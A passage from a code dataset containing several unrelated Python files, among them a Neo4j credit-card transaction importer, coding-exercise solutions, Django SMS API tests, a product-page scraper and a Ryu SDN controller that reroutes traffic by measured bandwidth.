True if `saliency_dict` contains\n composite, False otherwise.\n\n :raises: ValueError: if dictionary does not contain expected keys.\n \"\"\"\n\n pickle_file_handle = open(pickle_file_name, 'rb')\n saliency_dict = pickle.load(pickle_file_handle)\n pickle_file_handle.close()\n\n pmm_flag = MEAN_PREDICTOR_MATRICES_KEY in saliency_dict\n\n if pmm_flag:\n missing_keys = list(\n set(PMM_FILE_KEYS) - set(saliency_dict.keys())\n )\n else:\n missing_keys = list(\n set(STANDARD_FILE_KEYS) - set(saliency_dict.keys())\n )\n\n if len(missing_keys) == 0:\n return saliency_dict, pmm_flag\n\n error_string = (\n '\\n{0:s}\\nKeys listed above were expected, but not found, in file '\n '\"{1:s}\".'\n ).format(str(missing_keys), pickle_file_name)\n\n raise ValueError(error_string)\n","repo_name":"thunderhoser/GewitterGefahr","sub_path":"gewittergefahr/deep_learning/saliency_maps.py","file_name":"saliency_maps.py","file_ext":"py","file_size_in_byte":22461,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"22"} +{"seq_id":"21380706913","text":"import pandas as pd\nimport time\nimport threading\nfrom queue import Queue\nimport math\nimport os.path\nimport sys\n\nfrom util.graphdb_base import GraphDBBase\n\nnum_threads = 5\n\nclass CreditCardTransactionImporter(GraphDBBase):\n\n def __init__(self, argv):\n super().__init__(command=__file__, argv=argv)\n self._transactions = Queue()\n self._dictionaries = {}\n self._print_lock = threading.Lock()\n with self._driver.session() as session:\n self.execute_without_exception(\"CREATE CONSTRAINT ON (s:Transaction) ASSERT s.transactionId IS UNIQUE\")\n self.execute_without_exception(\"CREATE INDEX ON :Transaction(isFraud)\")\n\n def import_transactions(self, directory):\n j = 0\n transactions = pd.read_csv(os.path.join(directory, \"creditcard.csv\"))\n # Starting threads for parallel writing\n for k in range(num_threads):\n print(\"starting thread: \", k)\n writing_thread = threading.Thread(target = self.write_transaction)\n writing_thread.daemon = True\n writing_thread.start()\n\n for index, row in transactions.iterrows():\n j += 1\n transaction = {\n 'transactionId': j,\n 'isFraud': row['Class'],\n 'transactionDt': row['Time'],\n 'transactionAmt': row['Amount']}\n vector = self.normalize(row, ['Time', 'Class'])\n transaction['vector'] = vector\n self._transactions.put(transaction)\n # ADD ROW\n if j % 10000 == 0:\n print(j, \"lines processed\")\n print(j, \"lines processed\")\n self._transactions.join()\n print(\"Done\")\n\n def normalize(self, row, exludes):\n vector = []\n for item in list(row.items()):\n if item[0] in exludes:\n continue\n if isinstance(item[1], str):\n vocab = {}\n if item[0] in self._dictionaries:\n vocab = self._dictionaries[item[0]]\n else:\n self._dictionaries[item[0]] = vocab\n\n if item[1] in vocab:\n vocab_index = vocab[item[1]]\n else:\n vocab_index = len(vocab) + 1\n vocab[item[1]] = vocab_index\n vector.append(float(vocab_index))\n self._dictionaries[item[0]] = vocab\n elif math.isnan(item[1]):\n vector.append(float(0))\n else:\n vector.append(float(item[1]))\n return vector\n\n def write_transaction(self):\n query = \"\"\"\n WITH $row as map\n CREATE (transaction:Transaction {transactionId: map.transactionId})\n SET transaction += map\n \"\"\"\n i = 0\n while True:\n row = self._transactions.get()\n with self._driver.session() as session:\n try:\n session.run(query, {\"row\": row})\n i += 1\n if i % 2000 == 0:\n with self._print_lock:\n print(i, \"lines processed on one thread\")\n except 
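# read_file above detects the file flavour by key membership and validates
# with a set difference; the same pattern in isolation (the key names here
# are illustrative only):
EXPECTED_KEYS = {'saliency_matrices', 'model_file_name'}

def check_keys(saliency_dict):
    missing_keys = set(EXPECTED_KEYS) - set(saliency_dict.keys())
    if missing_keys:
        raise ValueError('Keys expected but not found: {}'.format(sorted(missing_keys)))
    return saliency_dict

check_keys({'saliency_matrices': [], 'model_file_name': 'model.h5'})  # ok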
Exception as e:\n                    print(e, row)\n            self._transactions.task_done()\n\n\nif __name__ == '__main__':\n    importer = CreditCardTransactionImporter(sys.argv[1:])\n\n    start = time.time()\n    base_path = importer.source_dataset_path\n    if not base_path:\n        base_path = \"../../../dataset/creditcard\"\n\n    importer.import_transactions(directory=base_path)\n    print(\"Time to complete paysim ingestion:\", time.time() - start)\n\n    # intermediate = time.time()\n    # importer.post_processing(sess_clicks=sessions)\n    # print(\"Time to complete post processing:\", time.time() - intermediate)\n\n    print(\"Time to complete end-to-end:\", time.time() - start)\n\n    importer.close()\n","repo_name":"alenegro81/gpml","sub_path":"ch09/import/creditcard/import_credit_card.py","file_name":"import_credit_card.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"22"} +{"seq_id":"13967029166","text":"'''40. A statistical survey was carried out in five Brazilian cities to collect data on traffic accidents. The following\ndata were obtained:\na. City code;\nb. Number of passenger vehicles (in 1999);\nc. Number of traffic accidents with victims (in 1999). We want to know:\nd. The highest and lowest accident counts and which city each belongs to;\ne. The average number of vehicles across the five cities together;\nf. The average number of traffic accidents in cities with fewer than 2,000 passenger vehicles.'''\n\ndef estatistica_cidades():\n    cod = []\n    num_veic = []\n    num_acid = []\n\n    while len(cod) < 5:\n        cod.append(int(input('City {} Code: '.format(len(cod)+1))))\n        num_veic.append(int(input('City {} Number of Vehicles: '.format(len(num_veic)+1))))\n        num_acid.append(int(input('City {} Number of Accidents: '.format(len(num_acid)+1))))\n\n    # Item d concerns accident counts, so take the min/max indices over\n    # num_acid (the original indexed num_veic here by mistake).\n    index_trans_min, index_trans_max = num_acid.index(min(num_acid)), num_acid.index(max(num_acid))\n    media_veic = sum(num_veic) / len(num_veic)\n\n    # Item f asks for the average number of accidents (not vehicles) in\n    # cities with fewer than 2000 vehicles.\n    cid_menor_2mil = []\n    for i in range(len(num_veic)):\n        if num_veic[i] < 2000:\n            cid_menor_2mil.append(num_acid[i])\n\n    media_cid_menor_2mil = sum(cid_menor_2mil) / len(cid_menor_2mil)\n\n    print('\\nThe highest accident count is: {} and the city code is: {}'.format(num_acid[index_trans_max],cod[index_trans_max]))\n    print('The lowest accident count is: {} and the city code is: {}'.format(num_acid[index_trans_min],cod[index_trans_min]))\n    print('The average number of vehicles across the five cities is: {}'.format(media_veic))\n    print('The average number of accidents in cities with fewer than 2,000 vehicles is: {}'.format(media_cid_menor_2mil))\n    print('\\n')\nestatistica_cidades()\n\n\n    \n    ","repo_name":"Edspx/ExerciciosPythonBrasil","sub_path":"3EstruturaDeRepeticao/3_40.py","file_name":"3_40.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28450225885","text":"import libRL\n\nfrom libRL.tools.f_peak import f_peak\nfrom libRL.tools.quarter_wave import power_fn, quarter_wave\n\nfrom .utils import Expectation\n\n\nclass TestFPeak:\n    def test_f_peak(self, al_tio2_fixture):\n        fn = f_peak(al_tio2_fixture.name, f_set=(1, 18, 0.1), d_set=(0, 5, 0.1))\n\n        actual = {str(i): fn(i) for i in range(1, 5)}\n        expected = Expectation(\"al_tio2_fpeak.json\")\n        for av, ev in zip(actual.values(), expected.read().values()):\n            assert av == ev\n\n    def test_quarter_wave(self, al_tio2_fixture):\n        fn = quarter_wave(al_tio2_fixture.name, f_set=(1, 18, 0.1),)\n        assert 
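# The importer above fans rows out to daemon worker threads through a
# Queue and blocks on queue.join() until every row is written. The
# skeleton of that producer/consumer pattern, self-contained:
import threading
from queue import Queue

tasks = Queue()

def worker():
    while True:
        item = tasks.get()
        try:
            pass  # the database write would happen here
        finally:
            tasks.task_done()  # mark done even if the write fails

for _ in range(5):  # num_threads
    t = threading.Thread(target=worker)
    t.daemon = True  # daemon threads let the process exit while they block
    t.start()

for row in range(100):
    tasks.put(row)
tasks.join()  # returns once every put() item has been task_done()'d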
len(fn.f) == len(fn(1))\n\n def test_power_fn(self, al_tio2_fixture):\n fn = power_fn(al_tio2_fixture.name, f_set=(1, 18, 0.1), d_set=(0.1, 5, 0.1))\n assert len(fn.d) == len(fn(1))\n","repo_name":"1mikegrn/libRL","sub_path":"test/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"35234841575","text":"\"\"\"Solution for day 6, part 1 puzzle on adventofcode.com\"\"\"\n\nwith open(file='input.txt',mode='rt',encoding='utf-8') as file:\n l = file.read().split('\\n\\n')\n customs_list = []\n for item in l:\n customs_list.append(item.replace('\\n',''))\n complete_set = []\n for item in customs_list:\n response_set = set()\n for response in item:\n response_set.add(response)\n complete_set.append(response_set)\n\ndef calculate_responses(input):\n total = 0\n for i in input:\n total += len(i)\n return total\n\nprint(calculate_responses(complete_set))","repo_name":"kenkitts/advent_of_code","sub_path":"day6/d6p1.py","file_name":"d6p1.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14115597953","text":"from typing import List\n\n\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n lo, hi = 0, len(nums)\n while lo != hi:\n mid = (lo + hi) // 2\n if target <= nums[mid]:\n hi = mid\n else:\n lo = mid + 1\n return lo\n\n\nif __name__ == '__main__':\n solution = Solution()\n nums = [1, 3, 5, 6]\n target = 5\n result = solution.searchInsert(nums, target)\n print(result)\n","repo_name":"AntonBelski/leetcode_puzzles","sub_path":"0035_search_insert_position.py","file_name":"0035_search_insert_position.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38307356892","text":"# -*- coding: utf-8 -*-\nimport time\n#使用时间套件\nfrom bs4 import BeautifulSoup\n#使用BeauitfulSoup\n\nnow_data = time.strftime(\"%Y/%m/%d\")\nnow_time = time.strftime(\"%H:%M:%S\")\nnow = now_data + ' ' + now_time\n#取出今天日期、时间,并整成变数now\n\nurl0 = 'https://www.momoshop.com.tw/goods/GoodsDetail.jsp?i_code=4999052&str_category_code=2001000056&mdiv=2001000056&Area=DgrpCategory'\n\n\nfrom selenium import webdriver\n\ndriver = webdriver.PhantomJS(executable_path=r'C:\\Users\\IMITA-PC-13\\Desktop\\phantomjs-2.1.1-windows\\bin\\phantomjs') # PhantomJs\ndriver.get(url0) # 输入网址,交给浏览器 \npageSource = driver.page_source # 取得网页源代码\n#print(pageSource)\n\nsoup = BeautifulSoup(pageSource,\"lxml\")\n#将资料用lxml装起来放置到soup\n\ndriver.quit() # 关闭浏览器\n\n#以下是取出需要的资料------------------以下是第二阶段\nimages = 'img.jqzoom'\n#介绍图片\ntitle = 'div.prdnoteArea h1'\n#标题 *div.class名称为product_introduction 里面的h3\nsintro = 'ul#categoryActivityInfo' \n#小介绍\noriginal_price = 'ul.prdPrice del'\n#原价\nspecial_price = 'li.special'\n#促销价格\nintro = 'iframe#ifrmGoods'\n#主介绍\nspecification = 'div.attributesArea table'\n#规格\n\n#资料转换区\nimages0 = soup.select(images)\ntitle0 = soup.select(title)\nsintro0 = soup.select(sintro)\noriginal_price0 = soup.select(original_price)\nspecial_price0 = soup.select(special_price)\nintro0 = soup.select(intro)\nspecification0 = soup.select(specification)\n\nprint('标题:' , images0)#资料已经干净\nprint('标题:' , title0[0].text)#资料已经干净\nprint('小介绍:' , sintro0[0].text)#仍有问题\nprint('原价:' , original_price0[0].text)#资料已经干净\nprint('特价:' , special_price[0].text.rstrip().strip())#抓取到了\nprint('主介绍:' , 
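# The searchInsert loop above is a hand-written lower-bound binary search;
# the standard library exposes the identical semantics as bisect_left:
from bisect import bisect_left

assert bisect_left([1, 3, 5, 6], 5) == 2  # target present: its index
assert bisect_left([1, 3, 5, 6], 2) == 1  # absent: insertion point
assert bisect_left([1, 3, 5, 6], 7) == 4  # past the end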
intro0)#有点问题*******************\nprint('规格:' , specification0[0])#呈现源代码\n\nprint('资料抓取日期:' + now)","repo_name":"ts00189145/python","sub_path":"[等待加入for迴圈]單一頁面抓取/momoshop.py","file_name":"momoshop.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12188804668","text":"from unittest.mock import patch\nfrom rest_framework import status\nfrom rest_framework.test import force_authenticate\n\nfrom .base_tests import BaseTest\nfrom api.sms import views, models\nfrom . import dummy_data\n\n\nclass SMSRequestViewsTest(BaseTest):\n \"\"\"Test SMS request creation list and deletion\"\"\"\n @patch(\"api.sms.serializers.send_sms\")\n def test_sms_request_creation_succeeds(self, _):\n \"\"\"Test that sms creation with correct data will be successful\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.valid_sms_data)\n force_authenticate(request, self.user)\n response = views.SMSRequestView.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n \n def test_create_sms_request_fails_with_no_group_or_recepients_fails(self):\n \"\"\"Test that sms creation without group or receipient will fail\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.data_without_recepient_or_group)\n force_authenticate(request, self.user)\n response = views.SMSRequestView.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data['detail'], \"A receipient group id or a recepient contact list must be provided\")\n\n @patch(\"api.sms.serializers.send_sms\")\n def test_create_sms_request_with_both_group_or_recepients_succeeds(self, _):\n \"\"\"Test that sms creation with both group or receipient will succeed\"\"\"\n dummy_data.data_with_both_recepient_or_group[\"groups\"] = [self.group_id]\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.data_with_both_recepient_or_group)\n force_authenticate(request, self.user)\n instance = models.GroupMember(phone=self.user.phone, company=self.user.company)\n instance.save()\n self.group_instance.members.add(instance)\n self.group_instance.save()\n response = views.SMSRequestView.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n @patch(\"api.sms.serializers.send_sms\")\n def test_get_sms_requests_succeeds(self, _):\n \"\"\"Test that get created sms succeed\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, dummy_data.valid_sms_data)\n get_request = self.request_factory.get(self.create_list_sms_url)\n force_authenticate(request, self.user)\n force_authenticate(get_request, self.user)\n views.SMSRequestView.as_view()(request)\n response = views.SMSRequestView.as_view()(get_request)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual((response.data)['results'][0][\"message\"], dummy_data.valid_sms_data[\"message\"])\n\n @patch(\"api.sms.serializers.send_sms\")\n def test_delete_sms_requests_valid_data_succeeds(self, _):\n \"\"\"Test that delete created sms succeed\"\"\"\n instance = models.SMSRequest(company=self.user.company, recepients=[\"+254726406733\"], message=\"Come\")\n instance.save()\n id = instance.pk\n delete_request = self.request_factory.delete(self.create_list_sms_url, {\"message_requests\": [id]})\n force_authenticate(delete_request, self.user)\n response = views.SMSRequestView.as_view()(delete_request)\n 
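# The scraper above only uses the PhantomJS driver to hand page_source to
# BeautifulSoup.select(); the select/extract step itself needs no browser.
# A minimal sketch on a static snippet (requires bs4 and lxml installed):
from bs4 import BeautifulSoup

html = '<div class="prdnoteArea"><h1>demo product</h1></div>'
soup = BeautifulSoup(html, 'lxml')
matches = soup.select('div.prdnoteArea h1')  # CSS selector -> list of tags
print(matches[0].text)  # 'demo product'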
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_delete_sms_requests_non_existent_id_fails(self):\n \"\"\"Test that delete sms requests with non-existent id fails\"\"\"\n delete_request = self.request_factory.delete(self.create_list_sms_url, {\n \"message_requests\": [100]\n })\n force_authenticate(delete_request, self.user)\n response = views.SMSRequestView.as_view()(delete_request)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"message_requests\"][0], ['Invalid pk \"100\" - object does not exist.'])\n\n def test_create_brand_name_succeeds(self):\n \"\"\"Test that brand name is created with correct data\"\"\"\n request = self.request_factory.post(self.create_list_sms_url, {\n \"name\": \"Branded\"\n })\n \n force_authenticate(request, self.user)\n response = views.CreateBrandName.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_list_brand_names_succeeds(self):\n \"\"\"Test list brand name request \"\"\"\n request = self.request_factory.get(self.create_list_sms_url)\n self.user.is_superuser = True\n self.user.save()\n instance = models.SMSBranding.objects.create(name=\"create\", company=self.user.company)\n force_authenticate(request, self.user)\n response = views.ListBrandNameRequests.as_view()(request)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"results\"][0][\"id\"], instance.pk)\n\n def test_edit_brand_names_succeeds(self):\n \"\"\"Test edit brand name request\"\"\"\n request = self.request_factory.patch(self.create_list_sms_url, {\"is_approved\": True})\n self.user.is_superuser = True\n self.user.save()\n instance = models.SMSBranding.objects.create(name=\"create\", company=self.user.company)\n force_authenticate(request, self.user)\n response = views.EditBrandNameRequests.as_view()(request, pk=instance.pk)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"is_approved\"], True)\n","repo_name":"ElMonstro/SMSPlatform","sub_path":"tests/api/sms/test_sms_views.py","file_name":"test_sms_views.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"18431845523","text":"from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ether_types\nfrom ryu.lib.packet import ipv4\nfrom ryu.lib.packet import tcp\nfrom ryu.lib.packet import icmp\nfrom ryu import cfg\nfrom ryu.lib import hub\nimport time\n\nclass SimpleSwitch13(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch13, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n self.ingress_icmp_rule_installed = False\n self.datapaths = {}\n self.flow_datapaths ={}\n self.monitor_thread = hub.spawn(self._monitor)\n self.prev_sec=0\n self.prev_nsec = 0\n self.prev_bytes = 0\n self.traffic_bw = 0\n self.installed_flows={}\n self.am_deleting=0\n\n CONF = cfg.CONF\n CONF.register_opts([\n cfg.IntOpt('bandwidth', default=500000, help = ('Bandwidth threshold'))])\n\n self.thbandwidth = CONF.bandwidth\n self.selected_path = 1\n print('bandwidth = 
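# The tests above stub the SMS gateway with @patch so nothing real is
# sent; the mechanics in miniature with plain unittest.mock (the module
# path '__main__' assumes this snippet runs as a script):
from unittest.mock import patch

def send_sms(number, text):
    raise RuntimeError('would hit a real gateway')

def notify(number):
    send_sms(number, 'hello')
    return True

with patch('__main__.send_sms') as fake_send:
    assert notify('+254700000000') is True
    fake_send.assert_called_once_with('+254700000000', 'hello')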
{}'.format(CONF.bandwidth))\n\n def _monitor(self):\n while True:\n for dp in self.datapaths.values():\n self._request_stats(dp)\n hub.sleep(1)\n\n def _request_stats(self, datapath):\n print('send stats request: {}'.format(datapath.id) )\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)\n\n #req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n #datapath.send_msg(req)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n def _flow_stats_reply_handler(self, ev):\n body = ev.msg.body\n\n \n self.logger.info('datapath '\n 'in-port '\n 'out-port packets bytes sec bw nsec')\n self.logger.info('---------------- '\n '-------- '\n '-------- -------- -------- -------- -------- -----------')\n\n \n \n for stat in sorted([flow for flow in body if flow.priority == 1],\n key=lambda flow: (flow.match['in_port'])):\n\n self.logger.info('%016x %17s %8x %8d %8d %8d %8d %d',\n ev.msg.datapath.id,\n stat.match['in_port'], \n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count, stat.duration_sec, 0, stat.duration_nsec)\n\n bw=0\n if self.prev_bytes==0:\n self.prev_bytes=stat.byte_count\n self.prev_sec=stat.duration_sec\n self.prev_nsec=stat.duration_nsec\n elif stat.byte_count==self.prev_bytes:\n self.traffic_bw=0\n elif stat.byte_count>self.prev_bytes:\n interval_sec=(stat.duration_sec-self.prev_sec)+(stat.duration_nsec-self.prev_nsec)/1e9\n if interval_sec>0:\n bw=(stat.byte_count-self.prev_bytes)*8.0/interval_sec\n bwkb=bw/1000\n path=1\n if bwkb>self.thbandwidth:\n path=2\n\n print(\"bwkb={}, th={}, path={}, selected={}\".format(bwkb, self.thbandwidth, path, self.selected_path))\n\n if path!=self.selected_path:\n print(\"---------------PATH TO BE UPDATED-----------\")\n self.selected_path=path\n self.am_deleting=1\n self.clear_flows()\n self.am_deleting=0\n self.mac_to_port = {}\n self.update_flows()\n \n if bw>self.traffic_bw:\n self.traffic_bw=bw\n #print(\"byte, prev_byte={}, {}\".format(stat.byte_count,self.prev_bytes))\n self.prev_bytes=stat.byte_count\n self.prev_sec=stat.duration_sec\n self.prev_nsec=stat.duration_nsec\n \n \n \n\n def update_flows(self):\n for dp in self.installed_flows:\n datapath=self.installed_flows[dp]\n if self.selected_path==1:\n if dp in [2,3]:\n self.add_flow_p(datapath, 1, 1, 2)\n self.add_flow_p(datapath, 1, 2, 1)\n \n elif datapath.id in [1,6]:\n self.add_flow_p(datapath, 1, 1, 3)\n self.add_flow_p(datapath, 1, 3, 1)\n \n elif self.selected_path==2:\n if dp in [4,5]:\n self.add_flow_p(datapath, 1, 1, 2)\n self.add_flow_p(datapath, 1, 2, 1)\n \n elif datapath.id in [1,6]:\n self.add_flow_p(datapath, 1, 2, 3)\n self.add_flow_p(datapath, 1, 3, 2)\n \n\n #self.add_flow_p(self.installed_flows[dp], 1, self.selected_path, 3)\n #self.add_flow_p(self.installed_flows[dp], 1, 3, self.selected_path)\n\n @set_ev_cls(ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n self.installed_flows[datapath.id]=datapath\n print(\"state_change_handler: datapath={}\".format(datapath.id))\n if ev.state == MAIN_DISPATCHER:\n if datapath.id not in self.datapaths:\n self.logger.debug('register datapath: %016x', datapath.id)\n \n if datapath.id in [2,3]:\n self.add_flow_p(datapath, 1, 1, 2)\n self.add_flow_p(datapath, 1, 2, 1)\n \n elif datapath.id in [1,6]:\n self.add_flow_p(datapath, 1, 1, 3)\n self.add_flow_p(datapath, 1, 3, 1)\n \n if datapath.id==1:\n self.datapaths[datapath.id] 
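# The flow-stats handler above turns two successive byte counters into a
# bandwidth figure; the arithmetic in isolation (duration_nsec carries the
# sub-second part, hence the / 1e9):
def bandwidth_bps(prev_bytes, prev_sec, prev_nsec, cur_bytes, cur_sec, cur_nsec):
    interval = (cur_sec - prev_sec) + (cur_nsec - prev_nsec) / 1e9
    if interval <= 0:
        return 0.0
    return (cur_bytes - prev_bytes) * 8.0 / interval  # bytes -> bits/s

print(bandwidth_bps(0, 0, 0, 125000, 1, 0))  # 1000000.0, i.e. 1 Mbit/s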
= datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.debug('unregister datapath: %016x', datapath.id)\n del self.datapaths[datapath.id]\n \n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n print(\"feature_handler: datapath={}\".format(datapath))\n\n # install table-miss flow entry\n #\n # We specify NO BUFFER to max_len of the output action due to\n # OVS bug. At this moment, if we specify a lesser number, e.g.,\n # 128, OVS will send Packet-In with invalid buffer_id and\n # truncated packet data. In that case, we cannot output packets\n # correctly. The bug has been fixed in OVS v2.1.0.\n match = parser.OFPMatch()\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions)\n\n @set_ev_cls(ofp_event.EventOFPFlowRemoved, MAIN_DISPATCHER)\n def flow_removed_handler(self, ev):\n msg = ev.msg\n dp = msg.datapath\n ofp = dp.ofproto\n\n if msg.reason == ofp.OFPRR_IDLE_TIMEOUT:\n reason = 'IDLE TIMEOUT'\n elif msg.reason == ofp.OFPRR_HARD_TIMEOUT:\n reason = 'HARD TIMEOUT'\n elif msg.reason == ofp.OFPRR_DELETE:\n reason = 'DELETE'\n elif msg.reason == ofp.OFPRR_GROUP_DELETE:\n reason = 'GROUP DELETE'\n else:\n reason = 'unknown'\n\n #print(\"\\n\\n===FLOW REMOVED===\\n\\n\")\n if dp.id==1:\n self.prev_sec=0\n self.prev_nsec = 0\n self.prev_bytes = 0\n self.traffic_bw = 0\n '''\n self.logger.info('OFPFlowRemoved received: '\n 'cookie=%d priority=%d reason=%s table_id=%d '\n 'duration_sec=%d duration_nsec=%d '\n 'idle_timeout=%d hard_timeout=%d '\n 'packet_count=%d byte_count=%d match.fields=%s',\n msg.cookie, msg.priority, reason, msg.table_id,\n msg.duration_sec, msg.duration_nsec,\n msg.idle_timeout, msg.hard_timeout,\n msg.packet_count, msg.byte_count, msg.match)\n '''\n \n def del_flow(self, datapath):\n print(\"Deleting flow for S{}\".format(datapath.id))\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n match = parser.OFPMatch(in_port=1, eth_src=1, eth_dst=2)\n\n mod = parser.OFPFlowMod(datapath=datapath, command=ofproto.OFPFC_DELETE, \n cookie=1, cookie_mask=0xFFFFFFFFFFFFFFFF,\n table_id=ofproto.OFPTT_ALL,\n out_port=ofproto.OFPP_ANY,\n out_group=ofproto.OFPG_ANY)\n \n datapath.send_msg(mod)\n\n def clear_flows(self):\n dpl=[]\n if self.selected_path==1:\n dpl=[1,2,3,6]\n else:\n dpl=[1,4,5,6]\n for dp in self.installed_flows:\n self.del_flow(self.installed_flows[dp])\n \n #self.installed_flows={}\n\n\n def add_flow_p(self, datapath, priority, in_port, out_port):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n actions = [parser.OFPActionOutput(out_port)]\n match = parser.OFPMatch(in_port=in_port)\n self.add_flow(datapath, priority, match, actions, flags=ofproto.OFPFF_SEND_FLOW_REM, cookie=1)\n \n def add_flow(self, datapath, priority, match, actions, idle_timeout=0, hard_timeout=0, flags=0, cookie=0, buffer_id=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(cookie=cookie, datapath=datapath, buffer_id=buffer_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout, flags=flags,\n priority=priority, match=match,\n instructions=inst)\n else:\n mod = parser.OFPFlowMod(cookie=cookie, datapath=datapath, priority=priority, 
idle_timeout=idle_timeout, hard_timeout=hard_timeout, flags=flags,\n match=match, instructions=inst)\n datapath.send_msg(mod)\n\n '''\n def create_icmp_request(self, datapath, pkt_ethernet, pkt_ipv4):\n\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=pkt_ethernet.ethertype,\n dst=pkt_ethernet.src,\t\t#ping source of TCP SYN\n src=pkt_ethernet.dst))\n print \"Creating ICMP. Dest={}, Src={}\".format(pkt_ethernet.src, pkt_ethernet.dst)\n pkt.add_protocol(ipv4.ipv4(dst=pkt_ipv4.src,\n src=pkt_ipv4.dst,\n proto=1))\n print \"Creating ICMP. Dest={}, Src={}, proto={}\".format(pkt_ipv4.src, pkt_ipv4.dst, 1)\n\trtt_info=str(pkt_ipv4.src)+\",\"+str(time.time())\n pkt.add_protocol(icmp.icmp(type_=icmp.ICMP_ECHO_REQUEST,\n code=0,\t\t\t\t\t\n csum=0,\n data=icmp.echo(1,1,bytearray(rtt_info))))\n\n pkt_dest = packet.Packet()\n pkt_dest.add_protocol(ethernet.ethernet(ethertype=pkt_ethernet.ethertype,\n dst=pkt_ethernet.dst,\t\t#ping destination of TCP SYN\n src=pkt_ethernet.src))\n print \"Creating ICMP. Dest={}, Src={}\".format(pkt_ethernet.dst, pkt_ethernet.src)\n pkt_dest.add_protocol(ipv4.ipv4(dst=pkt_ipv4.dst,\n src=pkt_ipv4.src,\n proto=1))\n print \"Creating ICMP. Dest={}, Src={}, proto={}\".format(pkt_ipv4.dst, pkt_ipv4.src, 1)\n\trtt_info_dest=str(pkt_ipv4.dst)+\",\"+str(time.time())\n pkt_dest.add_protocol(icmp.icmp(type_=icmp.ICMP_ECHO_REQUEST,\n code=0,\t\t\t\t\t\n csum=0,\n data=icmp.echo(1,1,bytearray(rtt_info_dest))))\n\n\n return [pkt, pkt_dest] \n\n def send_icmp(self, datapath, in_port, out_port, pkt_ethernet, pkt_ipv4):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n [icmp_pkt, icmp_pkt_dest] = self.create_icmp_request(datapath, pkt_ethernet, pkt_ipv4)\n icmp_pkt.serialize()\n data=icmp_pkt.data\n\n actions = [parser.OFPActionOutput(port=out_port)]\n print \"Sending ICMP. In={} Out={}\".format(out_port, in_port)\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=in_port, actions=actions, data=data)\n success=datapath.send_msg(out)\n print \"icmp packet out={}\".format(success)\n\n icmp_pkt_dest.serialize()\n data=icmp_pkt_dest.data\n\n actions = [parser.OFPActionOutput(port=in_port)]\n print \"Sending ICMP. In={} Out={}\".format(in_port, out_port)\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=out_port, actions=actions, data=data)\n 